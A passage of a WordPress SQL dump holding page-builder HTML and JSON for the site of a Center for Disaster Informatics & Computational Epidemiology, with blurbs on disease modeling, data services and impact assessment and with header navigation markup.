28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n          <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n        <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',20,'https://gsudice.dataconn.net/?p=1295',0,'revision','',0),(1296,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h31\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',23,'https://gsudice.dataconn.net/?p=1296',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1297,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path 